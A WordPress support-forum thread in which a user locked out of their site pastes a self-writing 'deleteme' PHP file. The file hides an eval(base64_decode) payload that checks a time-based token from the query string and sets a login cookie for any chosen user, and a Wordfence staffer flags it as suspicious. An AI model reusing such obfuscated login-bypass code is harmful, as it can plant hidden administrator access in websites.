Locked Out By WF

Resolved

(@celestial-petals)

Seems that I can’t get into my site after logging out. I get redirected to my login page, which is a custom login page from a custom login plugin. I wasn’t sure which plugin was doing this until I began disabling them in my filemanager one at a time. When I disabled the wordfence plugin I was able to login in. Is there a conflict between Wordfence & Admin Custom Login by webilizer? Oh, and a deleteme file is generated each time until I disable the WF plugin & login that way.

EXAMPLE deleteme file:

<?php
/******************************************************************************\
|*                                                                            *|
|* All text, code and logic contained herein is copyright by Installatron LLC *|
|* and is a part of 'the Installatron program' as defined in the Installatron *|
|* license: http://installatron.com/plugin/eula                               *|
|*                                                                            *|
|* THE COPYING OR REPRODUCTION OF ANY TEXT, PROGRAM CODE OR LOGIC CONTAINED   *|
|* HEREIN IS EXPRESSLY PROHIBITED. VIOLATORS WILL BE PROSECUTED TO THE FULL   *|
|* EXTENT OF THE LAW.                                                         *|
|*                                                                            *|
|* If this license is not clear to you, DO NOT CONTINUE;                      *|
|* instead, contact Installatron LLC at: [email protected]             *|
|*                                                                            *|
\******************************************************************************/
file_put_contents(dirname(__FILE__)."/wp-content/deleteme.f7b5b5b86eae44ae83d3805d0843c4a3.php", '<?php
/******************************************************************************\\
|*                                                                            *|
|* All text, code and logic contained herein is copyright by Installatron LLC *|
|* and is a part of \'the Installatron program\' as defined in the Installatron *|
|* license: http://installatron.com/plugin/eula                               *|
|*                                                                            *|
|* THE COPYING OR REPRODUCTION OF ANY TEXT, PROGRAM CODE OR LOGIC CONTAINED   *|
|* HEREIN IS EXPRESSLY PROHIBITED. VIOLATORS WILL BE PROSECUTED TO THE FULL   *|
|* EXTENT OF THE LAW.                                                         *|
|*                                                                            *|
|* If this license is not clear to you, DO NOT CONTINUE;                      *|
|* instead, contact Installatron LLC at: [email protected]             *|
|*                                                                            *|
\\******************************************************************************/
eval(base64_decode(\'JGZpbGUgPSggJHAgPSBzdHJwb3MoX19GSUxFX18sIigiKSApPT09IGZhbHNlID8gX19GSUxFX18gOiBzdWJzdHIoX19GSUxFX18sMCwkcCk7aWYgKCF1bmxpbmsoJGZpbGUpKXsJY2htb2QoJGZpbGUsMDc3Nyk7CXVubGluaygkZmlsZSk7fWRlZmluZSgiQUJTUEFUSCIsIGRpcm5hbWUoZGlybmFtZSgkZmlsZSkpLiIvIik7aW5jbHVkZV9vbmNlKEFCU1BBVEguIndwLWNvbmZpZy5waHAiKTtpbmNsdWRlX29uY2UoQUJTUEFUSC4id3AtYWRtaW4vaW5jbHVkZXMvZmlsZS5waHAiKTtpbmNsdWRlX29uY2UoQUJTUEFUSC4id3AtYWRtaW4vaW5jbHVkZXMvcGx1Z2luLnBocCIpO2luY2x1ZGVfb25jZShBQlNQQVRILiJ3cC1hZG1pbi9pbmNsdWRlcy90aGVtZS5waHAiKTtpbmNsdWRlX29uY2UoQUJTUEFUSC4id3AtYWRtaW4vaW5jbHVkZXMvbWlzYy5waHAiKTskayA9IHN1YnN0cigkX1NFUlZFUlsiUVVFUllfU1RSSU5HIl0sMCwzMik7JHUgPSBzdWJzdHIoJF9TRVJWRVJbIlFVRVJZX1NUUklORyJdLDMyKTskaCA9ICR3cGRiLT5nZXRfdmFyKCAkd3BkYi0+cHJlcGFyZSggIlNFTEVDVCB1c2VyX3Bhc3MgRlJPTSB7JHdwZGItPnVzZXJzfSBXSEVSRSBJRCA9ICVzIiwgJHUgKSApO2lmICggaXNfc3RyaW5nKCRoKSAmJiggJGsgPT09IG1kNShta3RpbWUoZGF0ZSgiSCIpLCBkYXRlKCJpIiksIDApLm1kNSgkaCkpICAgICAgICAgICAgICAgICAgICB8fCAkayA9PT0gbWQ1KG1rdGltZShkYXRlKCJIIiksIGRhdGUoImkiKS0xLCAwKS5tZDUoJGgpKSAgICAgICAgICAgICAgICAgICAgfHwgJGsgPT09IG1kNShta3RpbWUoZGF0ZSgiSCIpLCBkYXRlKCJpIikrMSwgMCkubWQ1KCRoKSkgKSl7CXdwX3NldF9hdXRoX2Nvb2tpZSgkdSk7fWhlYWRlcigiTG9jYXRpb246ICIuJ2h0dHA6Ly9tYWdpY2thY2FkZW15LmNvbS93cC1hZG1pbi8nKTs=\'));', LOCK_EX);

This topic was modified 8 years ago by Celestial Petals.
This topic was modified 8 years ago by Celestial Petals.

Viewing 2 replies - 1 through 2 (of 2 total)

Thread Starter Celestial Petals
(@celestial-petals)

7 years, 12 months ago

Is there anyone that help me with this?

wfalaa
(@wfalaa)

7 years, 12 months ago

Hi Celestial,
I’ve never heard of such a conflict before, but can you try doing the opposite and recheck this issue? I mean disabling “Admin Custom Login” plugin but keeping Wordfence plugin activated.

Another thing I noticed here is the code in this deleteme file. It looks suspicious, I highly recommend getting back to your hosting provider to ask them why this file is here and ask them about the code at the end of the file. if they didn’t recgnize this code, then please follow instructions mentioned in this article regarding “How to Clean a Hacked WordPress Site using Wordfence“.

Thanks.

Viewing 2 replies - 1 through 2 (of 2 total)

The topic ‘Locked Out By WF’ is closed to new replies.